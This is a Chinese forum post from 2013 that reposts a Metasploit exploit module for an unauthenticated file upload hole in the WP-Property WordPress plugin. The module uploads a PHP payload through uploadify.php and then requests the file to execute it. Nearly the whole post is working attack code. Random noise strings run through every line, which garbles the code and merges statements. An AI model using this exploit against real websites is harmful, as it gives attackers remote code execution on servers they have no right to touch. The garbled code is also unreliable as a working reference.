WordPress WP-Property PHP 文件上传漏洞7 \& M5 q8 Z! x# }7 s2 v1 d
* Q- |4 F$ A; k2 F+ A; a! F ## # This file is part of the Metasploit Framework and may be subject to
& K* L/ Y& E5 {7 V- i% V& L6 e" ~- ~6 a
# redistribution and commercial restrictions. Please see the Metasploit! O6 l; z/ l7 n/ }' Z! D0 W
; o |% R8 `/ P! A6 e w# Framework web site for more information on licensing and terms of use.( ^/ _6 \: L2 d( ^- X. L3 ?$ O
* X. y+ _5 | z( h) R# http://metasploit.com/framework/ ##4 A! W' W4 J% [" G& k6 G: ?
( R Q- T3 R4 U% o7 l ( E; l& o" `4 J- R3 q2 j6 }
1 U+ l; _1 @+ Q" w I 2 z: O8 C# z4 l' z+ _: m' c) ]2 e
2 Y K3 _- W% u2 T+ z! w2 o& d" X$ z
require 'msf/core'9 H. X) T) p2 o# d6 L! J
require 'msf/core/exploit/php_exe'
+ n) Q0 n+ _% m/ B& y0 a, ]- d
! P: I: W- i& }% H- \4 xclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
; Y: ~8 ~/ G) i, Q) s B'Description' => %q{
9 }$ N( h! f! rThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>2 e1 Q, f/ H1 m
[
3 T5 g* T5 P6 T ?'Sammy FORGIT', # initial discovery+ \& l9 k8 [/ K2 ~; x" P, g
'James Fitts <fitts.james[at]gmail.com>' # metasploit module8 v+ @) H# s* ^' t' ^2 x$ i1 G
],# J# w; y9 C5 ^ h( Q
'License' => MSF_LICENSE,) {: i1 I! b- ^" a
'References' =>) Q. N8 n8 g, K& N, I
[
% M [: q8 s( G( u- A[ 'OSVDB', '82656' ],% T! I! W; c! w; r
[ 'BID', '53787' ],
. \0 v+ F% R/ P6 ^- s# w: p[ 'EDB', '18987'],4 y3 o0 Z, a/ ~$ b9 y
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]/ y8 E# P8 Y) y( T0 M
],) V) B2 u, F! p9 W7 T
'Payload' =>! R9 q, E( z- D/ w% {4 T2 X
{7 M8 D P0 L- z: h g- U
'BadChars' => "\x00",
+ ^# Y1 R. u/ K6 b9 U" |},
: n4 e0 N( I: z, I# w- r'Platform' => 'php',# p- {- J; s0 {4 d) K% Q
'Arch' => ARCH_PHP,
) S/ V9 u$ m% N5 l'Targets' =>/ U! A" ~, ]; b# P; I7 S- I
[
3 R& f$ g8 _8 a5 v( S% I0 s$ [[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
; a9 A6 @0 `$ A; _* L& E; w[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- `, S& F6 N% n! C9 R+ G
],7 O {- o, w3 G4 X1 @
'DefaultTarget' => 0,
6 v2 s" m$ c: F4 j* Q* B'DisclosureDate' => 'Mar 26 2012'))
; T4 [$ _' G# K
8 I* Z/ x+ R! u4 R2 l, T$ _register_options(
7 R0 t! F8 ?0 I[
# Z/ c% z6 C- v5 P* U8 MOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' A% Z' |6 I O], self.class)
% Y/ `. N1 h o1 I p+ Z9 Gend
. W3 L3 q9 `3 ~. Y: F5 N3 v
* q! \2 N3 l; V; n: O! U" _% |def check/ ~9 i% s. p6 j* y& X1 k
uri = target_uri.path p& G& m5 m* @. B$ `
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
' F }. W& b7 R. f# k'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
3 D$ B# _* G) |! L})% s! {2 t4 `: [4 k8 B' l* Y
$ A. V# j& O% i# `3 T
if not res or res.code != 200
# V# {% Z; m+ }' @return Exploit::CheckCode::Unknown0 O ]7 \3 Z5 d" H; e/ m, [' G
end
/ x( f) `7 a" B! ~/ s O
3 T' O% `3 o! j' Treturn Exploit::CheckCode::Appears
* J n9 h9 D9 E7 [/ _ send; u0 A- a7 P* r1 _6 E. E0 }# O8 F( E- D, I
8 [6 J0 ^, _. Ddef exploit
, T) x& V3 t, Q9 ^6 J7 suri = target_uri.path( F! N# T* x* J+ b
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)/ V# p% D, L v# @6 K% t/ Y
( O! c2 f3 s, u Xdata = Rex::MIME::Message.new' l; ~; J( j( H: t4 ~% k' o9 ]
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
0 h3 R1 }) c/ J) d e5 l jdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
- G2 V5 q# V$ v: P# N& y& z3 C& J0 qpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 \9 u- j1 c$ S( y; B
6 r0 K8 A4 f6 c. f9 u+ V8 hprint_status("#{peer} - Uploading payload #{@payload_name}")
6 L& P! [7 R% [& r9 X1 ?! Hres = send_request_cgi({* O8 H$ ?& Y6 \6 O' z' ?
'method' => 'POST',
3 [+ j* o* `! r4 C5 }'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
# j2 F/ a5 {( B# A3 Y'ctype' => "multipart/form-data; boundary=#{data.bound}",
. @! h$ q) k9 f0 ^, l- ]$ }1 _- B4 ]'data' => post_data7 w G9 _3 h6 q
})9 q; F8 u! H6 q4 e' E6 ~
' U* f1 D7 A D2 Z Eif not res or res.code != 200 or res.body !~ /#{@payload_name}/) Z- y/ E7 H: t# ?% q. E" {* Y# Y
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
& r7 ?: i! D& z1 ~end
! C m/ u m6 U/ v* A$ Y/ t3 O+ z# [5 D# T
upload_uri = res.body/ s! S5 E' M# E+ h- B' R; [6 m" n
6 f/ l5 f. C, H* M6 A' F
print_status("#{peer} - Executing payload #{@payload_name}")
/ L, l- o9 V8 y& T$ l( {res = send_request_raw({! R( f/ U, f3 g3 b7 I
'uri' => upload_uri,& Y; v7 r, z# Y! r
'method' => 'GET'
+ P2 e0 d6 Q1 F8 P" ~/ v})7 P) T% o1 R* ^% ^) s0 i* l
end6 P4 K! _; K4 ?, r1 W
end
$ S) @7 I# |* Y9 W- w" \5 W0 k' b" P, M' v& l. g0 r d; l
不要问我这写的是什么 怎么利用 我是说msf.
6 h" r. C& v! X% [/ m9 c1 \+ J% z
|
发表于 2013-1-4 19:51:30
收藏
支持
反对